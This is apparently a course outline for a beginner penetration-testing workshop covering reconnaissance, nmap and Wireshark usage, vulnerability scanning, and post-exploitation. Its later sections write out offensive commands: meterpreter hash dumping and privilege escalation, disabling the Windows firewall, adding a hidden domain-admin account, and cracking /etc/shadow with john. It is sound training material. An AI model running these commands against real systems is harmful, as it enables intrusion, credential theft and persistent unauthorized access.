Our one-day program is designed for beginners and covers the fundamentals of cybersecurity. We start with the basics of common computer and network services and end with exploitation and an understanding of attack methodologies and strategies to defend against them. We will also focus on ways to build a home lab along with challenges and educational references to improve your skillset.

This course is for you if you are interested in a cybersecurity career, but you don’t have much hands-on experience yet? 

Who Should Attend

Anyone with a desire to learn offensive attack techniques and how to defend against methods employed by attackers to break into systems.  We foster a fun, collaborative and open environment where trial and error is embraced, failures are utilized as learning tools, and creative thinking is encouraged!

For those with little or no experience, this is a great first step in your cybersecurity career!

Agenda

  • Home Lab Setup
  • Passive Information Gathering
  • Windows Active Directory
  • IPv6 Overview
  • Wireshark Fundamentals
  • Active Information Gathering
  • Vulnerability Identification & Analysis
  • Common Services, Threats & Attacks
  • Exploitation
  • Post Exploitation
  • The Metasploit Framework
  • Capture the Flag

Windows Active Directory

Powered by a Domain Controller and using the Kerberos service (Port 88), Windows Active Directory serves as the management system for authentication and authorization of Windows based operating systems. 

With a domain controller, you can control just about any aspect of a client machine. In order to do so, a user will need to have an account on the domain they are logging into. Once authenticated the domain controller "pushes" all of the associated software, rules, and privileges to the device.

Keep in mind that there can be multiple domains and/or subdomains as well as multiple domain controllers. Also, users can have different privileges in different domains. (ex. An administrator in one domain can be a low level user in another). As a Network Administrator, you have the ability to control all aspects of your domain.

Here are some helpful resources to help you get started:

Passive Information Gathering

In cyber we are always hunting for information. There are two main types of information collection processes, active and passive. Let's start with the passive collection, which just means that we're going to use tools and methods that will (hopefully) not alert anyone to our presence.

Google

We all know how powerful Google is but we may not be totally sure of what Google can do. For example, you can use double quotes to be more specific in your searches. Offensive Security has an entire database called the The Google Hacking Database or GHDB that can help you identify things like footholds, files containing usernames, sensitive directories, and vulnerable files and servers. The database, which is updated regularly, will provide you the exact syntax to use to identify these vulnerabilities.

Google also has a "Google Trends" site that allows you to see what the world has been searching for. Some additional references include:

The OSINT Framework

The Open Source Intelligence (OSINT) Framework is a collection of tools that help improve your intelligence gathering process. The site will provide useful links to whatever you may be searching for.

IntelTechniques

People often put lots of unnecessary personal information on Social Media accounts. It is recommended to create “dummy” accounts and use these accounts to perform reconnaissance. Use as many different social media platforms as necessary to gather as much information as you can.

Shodan

Everything connected to the internet ca be detected by Shodan.

Way Back Machine

The way back machine allows you to view previous versions of websites. This is great for passive reconnaissance while giving you the option to see an earlier version of the site.

Robtex

Robtex is the go-to for network infrastructure enumeration. You can use this tool to identify domains, subdomains, A records, AAAA records, MX records, IP addresses and more.

HaveIBeenPwned

Have I been pwned? allows you to search across multiple data breaches to see if a customer’s or your email addresses were compromised

 

foller.me

Foller.me is Twitter application that allows for statistical analysis on public twitter profiles. You can

 

whois

The whois command allows you to identify registration information for a particular domain or ip address.

  • # whois espn.com
  • # whois 8.8.8.8

theHarvester

Pre-installed on Kali, theharvester allows you to purge search engines for email addresses.

  • Kali Tools - theharvester
  • # theharvester -d [targetdomain.com] -l 500 -b yahoo
  • # theharvester -d [targetdomain.com] -l 500 -b google
  • # theharvester -d [targetdomain.com] -l 500 -b linkedin
  • # theharvester -d [targetdomain.com] -l 1000 -b all

Discover

The Discover tool by Lee Baird comes highly recommended. It is great for passive or active reconnaissance on a domain or person.

  • Github - leebaird / discover
  • # git clone https://github.com/leebaird/discover.git /opt/discover
  • # cd /opt/discover
  • # ./update.sh
  • # ./discover.sh

Common Services, Threats & Attacks

The easiest approach to finding a way into a machine or network is to examine the common services that most systems use because there are usually well-known ways to attack those services. Let’s look at some basic services and tactics for attacking a system.

Some common services you should be familiar with are:

IPv6 Overview

All TCP/IP networks require an IP address for each device on the network. The version we have used since the beginning of the Internet is known as an IPv4 address. In this section we're going to look at the "next generation" address protocol called IPv6, how it differs from IPv4, and why it's become so important as the Internet continues to grow.

Think of every road, street, highway, or path you've every been on and now imagine there is another road, street, highway, or path directly underneath that not too many people know about. Now imagine that there is another 300+ Undecillion more of those roads, streets, highways, and paths. That is IPv6 in a nutshell. 

IPv6 was created due to the lack of available IPv4 addresses. With an additional 96 bits, it is 4 times the IP space of IPv4. We are allowed these additional addresses due to the fact that IPv6 addressing uses hexadecimal characters.

IPv6 has been around since 1994 and it has been enabled, by default, on all Windows operating systems since Windows Vista. It is like having another door on your home that you see occasionally but never open. Well, that door would still lead in insider into your home. Now imagine that door being an address on your computer or mobile device.

Yes, next time you are at the command prompt type ipconfig or ifconfig to see your current IP address. Most likely, you will see an IPv6 address with the prefix of FE80. That address will allow the same capabilities as the more common IPv4 address.

IPv4 and IPv6 are two separate protocols. It's like having the ability to speak two different languages. These protocols DO NOT communicate with each other without some type of translation or tunneling mechanism. Currently there are over 30 different types of tunneling with Microsoft's Teredo Tunneling being the most popular.

IPv6 Fun Facts:

  • There are more IPv6 Addresses than there are grains of sand in the world
  • Facebook's IPv6 address for their website contains face:b00c
    • 2a03:2880:f103:83:face:b00c:0:25de
  • # host www.facebook.com

Reference(s):

Recommended Book(s):

Wireshark Fundamentals

One of our primary tools for passive/active information gathering is a program called a packet analyzer or packet sniffer. Packet analyzers can take a file of captured data (known as a pcap file) and examine it in various ways to tell us more about the traffic between different machines on a network. The most popular packet analyzer is Wireshark, so let's take a look at how it works and how to use it.

Wireshark is a tool every security professional should be comfortable with. At a minimum, you should understand capture filters, display filters, profiles, and how to filter for different services as well as identifying IPv6 traffic. Our workshop is an introduction to network conversation statistics, threat hunting, and carving documents from .pcap files.

Capture filters allow you to caputre specific types of traffic, this prevents the capture of packets you don't thus not wasting valuable processing power and hard drive space.

To capture traffic from a specific host:

  • host 10.0.6.187

To capture traffic from a range of IPs:

  • net 10.0.6.0/24
  • net 10.0.6.0 mask 255.255.255.0

To capture traffic from only the source or destination range:

  • src net 10.0.6.0/24
  • src net 10.0.6.0 mask 255.255.255.0
  • dst net 10.0.6.0/24
  • dst net 10.0.6.0 mask 255.255.255.0

To capture traffic from a specific port or range of ports:

  • port 23
  • portrange 1-1024
  • tcp portrange 1-1024
  • UDP port 167
  • UDP portrange 1-1000

To capture traffic from a specific ur or host:

  • host www.cover6solutions.com

To exclude a specific type of traffic:

  • not port 23
  • not arp

To capture various types of IPv6 traffic:

  • ip6
  • dst host ff02::1

Reference(s):

Once you already start capturing traffic you can scan still fine tune by using a display filter.

To display traffic from a specific IP address:

  • ip.addr == 10.0.6.187

To display traffic from a specific source or destination IP address:

  • ip.src == 10.0.6.187
  • ip.dst == 10.0.6.187

To display source and destination traffic between two specific IP addresses:

  • ip.addr == 10.0.6.101 && ip.addr == 10.0.6.187

To display traffic from from multiple IP addresses:

  • ip.addr == 10.0.6.187 or ip.addr == 10.0.6.212

To display a specific type of traffic:

  • http
  • telnet
  • ipv6

Reference(s):

Active Information Gathering

Once we have exhausted the possible ways to passively collect information about our target, we will turn to active collection. These tools and methods are more powerful and can provide us with more information, but at the same time, they may expose you to detection. Let's have a look at some common techniques.

Wireshark

Wireshark is the best tool available for analyzing network traffic, it is highly recommended that everyone become very familiar with its usage.

 

Nmap

Nmap is a network mapper primarily used to identify the existence of network hosts or devices, ports, services and vulnerabilities. It is the tool of choice for network enumeration and will most likely be the first tool to get detected by network defense devices.

An ideal enumeration process is:

  • Host Identification
  • Port Identification
  • Service Identification
  • Vulnerability Identification
  • Exploitation

Yes, you can perform these tasks separately or with one command. The point is to keep your attack surface low while being accountable for you traffic. Some commands to perform these tasks are:

  • nmap -sn 10.0.6.200-254
  • nmap -v -T4 -sS -Pn --top-ports 10 10.0.6.200-254 --open
  • nmap -v -T4 -sT -Pn --top-ports 10 10.0.6.200-254 --open
  • nmap -v -T4 -sV -Pn --top-ports 25 10.0.6.200-254 --open
  • nmap -v -T4 -sV -sC -Pn -F 10.0.6.200-254 --open
  • nmap -v -T4 -A -p- 10.0.6.200-254 --open --randomize-hosts
  • nmap -v -T4 -p 445 --script=smb-vuln-ms10-061 10.0.6.200-254 –open
  • nmap -v -T4 -sU -sT -sV -p U:53,11,137,161,T:22,139,445 10.0.6.200-254 --open

 

Scanning with Metasploit

Although scanning with nmap is very popular, you can also use Metasploit auxiliary modules to perform scans. Below are some examples:

  • 21 auxiliary/scanner/ftp/anonymous
  • 21 auxiliary/scanner/ftp/ftp_version
  • 22 auxiliary/scanner/ssh/ssh_version
  • 23 auxiliary/scanner/telnet/telnet_version
  • 25 auxiliary/scanner/smtp/smtp_version
  • 69 auxiliary/scanner/tftp/tftpbrute
  • 79 auxiliary/scanner/finger/finger_users
  • 80 auxiliary/scanner/http/http_version
  • 110 auxiliary/scanner/pop3/pop3_version
  • 111 auxiliary/scanner/misc/sunrpc_portmapper
  • 123 auxiliary/scanner/ntp/ntp_monlist
  • 143 auxiliary/scanner/imap/imap_version
  • 512 auxiliary/scanner/rservices/rexec_login
  • 513 auxiliary/scanner/rservices/rlogin_login
  • 514 auxiliary/scanner/rservices/rsh_login
  • 1521 auxiliary/scanner/oracle/sid_enum
  • 3306 auxiliary/scanner/mysql/mysql_version
  • 5432 auxiliary/scanner/postgres/postgres_version
  • 5900 auxiliary/scanner/vnc/vnc_none_auth
  • 6000 auxiliary/scanner/x11/open_x11
  • 9100 auxiliary/scanner/printer/printer_version_info
  • 50000 auxiliary/scanner/db2/db2_version

nbtscan

A command-line scan tool, running on Windows or Linux, which displays NetBIOS information. It may even display logged in users and device purpose. This is helpful when building your initial hosts and users list.

  • # nbtscan 10.0.6.200-254
  • # nbtscan -v 10.0.6.200-254
  • C:> nbtscan 10.0.6.0/24

 

smbtree

  • # smbtree -b
  • # smbtree -D
  • # smbtree -S

 

enum4linux

enum4linux gives a multitude of information from a target machine. Info can be usernames, password policies, user and group information etc. It also shows what commands were used to get that information. This does not work all the time. An example of would be:

  • # enum4linux 10.0.6.218

 

host

The host command can be used in many different ways to identify information for particular host or website. This is a good way to begin DNS and/or network infrastructure enumeration.

  • # host www.facebook.com

facebook.com has address 173.252.110.27
facebook.com has IPv6 address 2a03:2880:2110:df07:face:b00c:0:1
facebook.com mail is handled by 10 msgin.t.facebook.com.

An example of a successful search for ipv6.google.com is the following:

  • # host ipv6.google.com

ipv6.google.com is an alias for ipv6.l.google.com.
ipv6.l.google.com has IPv6 address 2607:f8b0:4004:801::1004

To identify mail servers using the host command.

  • # host -mx cover6solutions.com

Nameserver identification

  • # host -t ns cover6solutions.com

 

 

dnsrecon

Dnsrecon is one of many tools you can use to perform a zone transfer in hopes of enumeration a domain’s dns enumeration.

  • # dnsrecon -d megacorpone.com -t axfr

 

 

dnsenum

Probably the easiest way to perform a zone transfer in Kali is to use the dnsenum tool. Keep in mind that most sites should not allow zone transfers!

  • # dnsenum megacorpone.com

 

fierce

Probably the easiest way to perform a zone transfer in Kali is to use the fierce command. Most sites should not allow zone transfers!! The zone file will contain a list of all the DNS names configured in that zone. Basically, the corporate network layout.

  • # fierce –dns cover6solutions.com

IPv6 Enumeration

IPv6 has been out for over 21 years. It is a protocol or method of communication just like IPv4 but with about 300+ undecillion more available IP addresses. Think of it as if for every road, highway, or path that exists there is another one directly under it that not many people know about. Now add 300+ undecillion more!

Please be very careful with these IPv6 tools. Spend some time researching and practicing more from the atk6 toolset.

atk6-alive6

Alive6 is a tool you can use to identify IPv6 hosts on the local network segment:

  • # atk6-alive6 -l eth0

 

Vulnerability Identification & Analysis

Once you have collected information about your target, you'll want to start thinking about how to use that information in your attack strategy. This is called vulnerability analysis and we'll see that there are many resources to help you discover how to compromise a system.

Vulnerability testing is the process of discovering flaws in systems and applications which can be leveraged by an attacker. These flaws can range anywhere from host and service misconfiguration, or insecure application design. Although the process used to look for flaws varies and is highly dependent on the particular component being tested, some key principals apply to the process.

Nmap

Nmap or Network Mapper is a FREE open source tool that allows for network discovery and security auditing. It can be installed on any operating system. Nmap can also be used to identify vulnerabilities by using the Nmap Scripting Engine (NSE). In Kali Linux, the directory for the NSE scripts can be found at /usr/share/nmap/scripts.

Before you use any specific scripts, you can/should use the -sC switch to have nmap run some basic scripts on a target. Here is an example:

  • root@kali:~# nmap -v -T4 -sC -sV -p- 10.0.6.216 --open

To run a specific script from the /scripts directory please ensure that you try to specify the correct port/service for that script. Here's an example:

  • root@kali:~# nmap -v -T4 -p 21 --script ftp-vsftpd-backdoor 10.0.6.216

Reference(s):

Nikto

Nikto is an open source web scanner that performs over 6700 potentially dangerous checks of outdated versions of servers. It is quick and easy to use and can potentially net you some results very quickly. You can use the -help command to see all of the available options but here is the quickest way to perform a web application vulnerability scan using Nikto.

  • root@kali:~# nikto -h 10.0.6.216

Reference(s):

OpenVAS

OpenVAS is one of the more popular vulnerability scanning tools. It is free and easily configurable in Kali Linux. Here are the commands to get OpenVAS up and running:

  • root@kali:~# apt-get update
  • root@kali:~# apt-get dist-upgrade
  • root@kali:~# apt-get install openvas
  • root@kali:~# openvas-setup
  • root@kali:~# openvas-start

Give it some time to start, after a view minutes you should be able to login at the following location https://127.0.0.1:9392.

Often times you may forget to take not of the password for the admin account. If this happens you can time the following to create a new admin password.

  • root@kali:~# openvasmd --user=admin --new-password=letmein

Reference(s):

Nessus

Nessus is the go-to tool for Enterprise vulnerability scans. Nessus is free (Nessus Home) for the first 16 IP addresses. However, you will need to fill out a quick form (First Name, Last Name, and Email Address) to receive a free license. From a price standpoint, you can purchase a one-year Nessus Pro license for $2,190. There is also a free option to try the Pro version for 7 days.

Reference(s):

Exploitation

If you can read to it (see it), and write to it (make changes), then you can exploit it.

Post Exploitation

Host Enumeration

Assuming you have a meterpreter shell on a windows host, you can use the following commands:

  • meterpreter > getsystem
  • meterpreter > getuid
  • meterpreter > run winenum
  • meterpreter > sysinfo
  • meterpreter > ipconfig
  • meterpreter > run get_local_subnet
  • meterpreter > enumdesktops
  • meterpreter > webcam_list
  • meterpreter > run post/windows/gather/smart_hashdump
  • meterpreter > run post/windows/gather/enum_applications
  • meterpreter > run post/windows/gather/enum_logged_on_users
  • meterpreter > run post/windows/gather/enum_shares
  • meterpreter > run post/windows/gather/checkvm
  • meterpreter > background

Upon exploitation of a Linux host, the screen may be blank but from here you can input your standard Linux post exploitation commands.

Firewalls

  • C:> netsh advfirewall show rule name=all
  • C:> netsh advfirewall set allprofile state off
  • C:> netsh advfirewall set allprofile state on

Domain Enumeration

The following commands, with the proper privileges allow for Windows domain enumeration.

  • C:> net users
  • C:> net user <USER NAME> /domain
  • C:> net user <USER NAME> <NEW PASSWORD>
  • C:> net users /domain
  • C:> net groups /domain
  • C:> net groups “Domain Admins” /domain

Adding a user to the Domain

Upon successfully enumerating the system/network and acquiring domain administrator privileges it is now time to add the user Cover6 with the password Cover6#C6S to the network/domain. The command to do this from a Windows host is:

  • C:WINDOWSsystem32> net user Cover6 Cover6#C6S /ADD /DOMAIN
  • C:> net user Cover6 Cover6#C6S /ADD /DOMAIN

Adding a user to the Domain Admins group

Upon successfully adding the user Cover6 to the domain, it is now time to add the user to the Domain Admins group. The command to do this from a Windows host is:

  • C:WINDOWSsystem32> net group “Domain Admins” Cover6 /ADD /DOMAIN
  • C:> net group “Domain Admins” Cover6 /ADD /DOMAIN

The Metasploit Framework

Privilege Escalation Techniques

Once you're inside a system, one of the first actions you'll want to take is privilege escalation. Ideally, you want control of the system, so figuring out how to turn your user-level account into an admin account will be a priority. Let's take a look at some of the ways to accomplish this.

Upon exploitation of a target, for the most part, you will obtain the same privileges as the exploited user. Often times you may need to escalate your privileges to become an Administrator.

Windows Privilege Escalation

Sometimes, the payload will automatically attempt to get system privileges. If this is successful then dumping password hashes is pretty easy. If not, you may need to try additional techniques. One such technique for stand-alone Windows systems is obtaining password hashes that are stored in the %systemroot%system32configSAM directory. This directory is normally locked but worth a try.

On domain controllers, password hashes are kept in the Active Directory %windir%WindowsDSntds.dit

Below are some quick and dirty ways to escalate privileges on a Windows host:

  • meterpreter > use priv
  • meterpreter > getsystem

If getsystem is unsuccessful you may need to set the additional escalation modules to the session of the previously compromised system. Here are some options: 

  • run post/windows/escalate/getsystem
  • run post/windows/escalate/droplnk
  • use exploit/windows/local/ask
  • use exploit/windows/local/bypassuac
  • use exploit/windows/local/trusted_service_path
  • use exploit/windows/local/ppr_flatten_rec
  • use exploit/windows/local/service_permissions
  • Fuzzy Security 2.0 - Windows Privilege Escalation Fundamentals - http://www.fuzzysecurity.com/tutorials/16.html

Mimikatz

Mimikatz may allow you to obtain clear text passwords from memory.

  • meterpreter > load mimikatz
  • meterpreter > kerberos

Incognito

Incognito allows for impersonation of user tokens.

  • meterpreter > use incognito
  • meterpreter > list_tokens -u
  • meterpreter > impersonate_token [Domain][User]
  • meterpreter > getuid
  • meterpreter > list_tokens -g

Linux Privilege Escalation

Probably the easiest way to escalate privileges on a Linux host is to use what we learned during the Exploitation phase; searching searchsploit or exploit-db.com for a privilege escalation exploit. Once we identify one, we simply download, compile the exploit, test it on a similar system then try it on our target.

Password Attacks

Moving around a compromised system would be a lot easier if you had the right passwords! You may find you need a password to get into a directory or access a file or change system settings, etc. But how do you discover and crack them? In this section, we'll discuss several different ways to attack passwords.

Windows Passwords

To run a hashdump post exploitation type:

  • meterpreter > run post/windows/gather/smart_hashdump

You can use an auxiliary module to crack the hashes you've gained within the database.

  • meterpreter > use auxiliary/analyze/jtr_crack_fast
  • meterpreter > run
  • meterpreter > creds

Linux Passwords

You can use john, a built-in tool in Kali to crack linux password files (/etc/password & /etc/shadow). Keep in mind that these files may be inaccessible so an escalation of privileges may be required.

  • # cat /etc/passwd > 218-passwd
  • # cat /etc/shadow > 218-shadow
  • # unshadow /etc/passwd /etc/shadow > 218-unshadow
  • # john 218-unshadow
  • # john --show 218-unshadow

A simpler option is to point john directly at the shadow file

  • # john /etc/shadow
  • # john 218-shadow

Note: You can also have John crack hashes using a word list. See the example below.

  • # john --wordlist=~/usr/share/wordlists/rockyou.txt 218-unshadow
  • # john --wordlist=~/usr/share/wordlists/rockyou.txt /etc/shadow

Antivirus & Firewall Evasion

Most of the systems in the real world that you will encounter will not be open and defenseless, and at a minimum, they will probably have antivirus/antimalware programs and firewalls installed specifically to keep you out! Are there ways around these defenses? In fact, there are and we'll learn about some of the most effective techniques for bypassing them.

Pivoting

It may be that your initial attack on a system gives you access to a machine or part of a network that seems unimportant to your target objectives. However, you can use that compromised location to find a way into more secured or inaccessible areas. This is known as pivoting, and we'll see in this section how to use pivoting techniques to expand our penetration of a network.

As part of post-exploitation enumeration may find and additional interface. In this case, you will need to “pivot” and start the process all over again.

Pivoting is the practice of moving from one identified network to the next. Pivoting often occurs whenever an additional IP address/network is discovered on an exploited host. There are multiple ways to pivot (plink.exe, ssh, portfwd etc.). The preferred method is with autoroute using Meterpreter. Upon successfully exploiting a host with an additional network interface, you can use the following command to forward all traffic through the newly exploited host.

  • meterpreter > run autoroute -s 172.16.6.0/24

Wireless Testing

WiFi and Bluetooth are everywhere today, but along with that convenience comes vulnerabilities. How secure is your local hotspot? Your home network? Are there ways to attack mobile devices like tablets and smartphones? Let's explore to exploit wireless protocols, devices, and infrastructures by learning how to use the best tools and methods.

Web Exploitation

As pentesters, you will need to be familiar with a variety of potential targets. Sometimes you will find the way into a target is through a website, and while it's easy to assume that websites are fairly safe and secure, you may be surprised in this section to see that there are many potential weaknesses in the constantly evolving environment of the web.

IDS/IPS Tools

A great free option for intrusion detection is Security Onion. Doug Burks and the Security Onion Solutions team consistently produce ISOs with updated builds so be sure keep your instance up to date. It runs on Linux, which you can get for free, and includes monitoring and log management tools. You can literally get it up and running in about 8 minutes, just remember to increase your processing cores (2) and RAM (40 GB), and add an extra interface ;-).

Reference(s):

 

Windows Forensics

The Windows operating system has come a long way. You literally can't do anything in Windows without it being logged somewhere. It is important that you understand some of the common function of the operating systems. Let's look at some commands and tools that will help identify current settings and possible vulnerabilities.

You should feel comfortable at the Windows command line. Here are some commands you can use to identify important information on a windows operating system. Keep in mind that attackers use the same commands as part of the post-exploitation process. 

To get a good overview of the current system:

  • C:> systeminfo

To identify the current user:

  • C:> whoami
  • C:> echo %username%

To view all the users:

  • C:> net users

To view all the users on the domain:

  • C:> net users /domain

To view domain properties of a specific user:net

  • C:> net user "user1" /domain

To view all of the groups on a domain:

  • C:> net groups /domain

To view a specific group:

  • C:> net groups "Domain Admins" /domain

To view the firewall profiles:

  • C:> netsh advfirewall show allprofiles

To view a verbose output of all scheduled tasks:

  • C:> schtasks /query /fo LIST /v

To see a list of started services:

  • C:> net start

To view a list of current drivers:

  • C:> driverquery

To view the Address Resolution Protocol (ARP) table: 

  • C:> arp -a

To view current connections and port status:

  • C:> netstat -ano

To view other host names on the network:

  • C:> net view /all

To view file/printer shares on a remote machine:

  • C:> net view \computername

To view logged on users:

  • C:> psloggedon \computername

To view a remote machine's NetBIOS Remote Name Table

  • C:> nbtstat -A 10.0.6.202

 

 

Windows Sysinternals is a suite of utilities designed to help you mange, troubleshoot and diagnose your Windows systems and applications. To allow use of the tools from any command line simply unpack the zip file and copy the tools to the System32 folder. Let's look at a few tools.

One of the most used tools in the suite is Process Explorer so we'll start there.

  • C:> procexp

An alternative to Process Explorer is the Process Monitor:

  • C:> procmon

To view programs configure to run during system bootup or login:

  • C:> autoruns

To view a listing of all TCP and UDP endpoints:

  • C:> tcpview

To view important system information and display it on the desktop:

  • C:> bginfo

Reference(s):

Incident Handling & Response

Threat Hunting

Intro to Malware Analysis

Intro to Memory Forensics

Capture the Flag (CTF)

One of the toughest and yet most enjoyable aspects of cybersecurity training is putting your new-found knowledge to work. There is so much to learn and you’re probably wondering what you can do with it all. Well like other fields of technology, in cyber there are a variety of live exercises known collectively as capture-the-flag, or CTF for short. These are competitions where you compete with other hackers and hacker teams from all over the world to test your skills against a variety of problems known as challenges. While there are prizes for the highest scoring competitors, for most of us the fun comes from trying to solve different types of problems that will test all of the skills you will learn in your cyber training.

Format

There are a few different kinds of CTFs but here we’ll discuss the most popular kind which is the “Jeopardy-style” competitions. When you start a competition you will go to a web page with all the challenge categories listed. Each set will display the challenge categories the way you would see the categories on “Jeopardy!” with a possible point score for each challenge. When you click on a challenge you will see below the title and the point score there is an input box for a “flag.” A flag is just a string of text that represents the solution, and when you find the flag, you have solved the challenge and you would then enter that flag into this field.

CTFs typically have a time limit of 1-3 days but as long as you follow the posted competition rules you are free to use any tools and methods you like to solve challenges. This is where your team becomes really important since you can divide the challenges so that team members with cryptography skills can focus on crypto challenges, and so forth.

Categories

Competitions try to cover a variety of knowledge areas, so the more you study the better prepared you will be to investigate and solve challenges. The categories will normally be a mixture of basic skills (stuff that all hackers and pentesters should know) and advanced topics such as analysis, cryptography, etc. Here are some common categories you may encounter in a competition:

  • Trivia — questions that can range from basic (“what does HTML stand for?”) to obscure (“what was released on Nov. 2, 1988?”)
  • Crypto — challenges that cover different types of encryption
  • Binary analysis — the use of tools to examine the binary code of a program
  • Recon — hunting for hidden clues on a network or the Internet
  • Forensics — examination of a file or computer system to search for evidence of a crime (for example)
  • Web — challenges that cover websites and web protocols, web browsers, etc.
  • Bash/CLI — command-line challenges
  • Scripting/coding — solving code problems, typically (but not always) in JavaScript, PHP, or Python
  • Password cracking — challenges that involve solving passwords and hashes
  • Reverse engineering — using tools and methods to examine malware for clues about how it works

Finding a CTF

Most security conferences and events will have at least one CTF competition on-site, these can be a great experience if you can attend in person, just keep in mind that there are typically admission fees and sometimes competition fees, so be sure to plan ahead by checking out the event website and Twitter feed to determine the cost of tickets and any other fees.

An easier path to CTF mastery is to register for one of the numerous online competitions that occur on a regular basis. You will be competing with hackers from all around the world but you and your team can work on challenges from the comfort of home or get together at a library, coffeehouse, or cafe. Online CTFs are almost always free to play and are usually run by universities, companies (like Google and MITRE), and even governments.

Preparation

Once you have registered for a CTF, you’ll want to find out as much as you can about the event so you can prepare to win! There is usually an archive on GitHub that contains the CTF challenges and solutions from previous years so start there; the categories and challenges will change from year to year of course, but it’s good practice to look through them anyway since the same people may be working on this year’s challenges. Sometimes a CTF from a previous year is still available on the Internet so it can be useful to try it out to get a sense of how tough it is (for example, check out the 2018 Google CTF in the resources below).

The next step is to see if you can find any “walkthroughs” (sometimes called “write-ups”) for any past CTF events. The easiest way to do this is to Google the CTF or even a specific challenge and see what results come back. You will find that there are often blog posts, PDFs, and even YouTube videos that show how to solve the exact challenge you are interested in. You’ll want to try to find the solution to a challenge on your own first of course, but if you just can’t figure it out, walkthroughs are a great resource. Even if you solve a challenge without any help, walkthroughs can be useful since there is often more than one way to find a solution; you might find your solution is easier, and then you can write your own walkthrough!

Tips

  • Flags normally have to be entered exactly as they are discovered, so its best to copy and paste them since a typo will cause your solution to be invalid.
  • The standard flag format is “flag{}” but sometimes challenges can be devious and not conform to the standard. You will usually be informed about this, but not always!
  • For the harder challenges, you may see there is a hint available. Sometimes they can be helpful if you get stuck, but keep in mind you will probably lose some points by using them.
  • The challenges cover so many areas of knowledge that it’s usually pretty hard to compete as an individual so if you have the chance to join a team or start one yourself, do it! A strong team will have people who are skilled in one or more areas so hopefully, you can tackle as many challenge categories as possible.

Resources

If you decide to try a CTF there are many resources available to help you prepare. Here are some to start with:

  • CTFTime -- A clearinghouse for CTF information from around the world, including rankings, upcoming competitions, etc.
  • 2018 Google CTF -- Google still has its CTF from last year available
  • MITRE Cyber Academy -- a good introductory resource
  • CTF Resources -- another good site for beginners
  • CTF Field Guide -- a free online book about getting started with CTFs
  • SecurityCTF subreddit -- this is a useful resource for walkthroughs, news, and rumors about CTFs
  • Over the Wire -- this site has many games to help you learn about different types of skills needed for CTF challenges
  • picoCTF -- Carnegie-Mellon keeps its beginners’ CTF available year-round
  • CTFs GitHub -- a large repository of write-ups and resources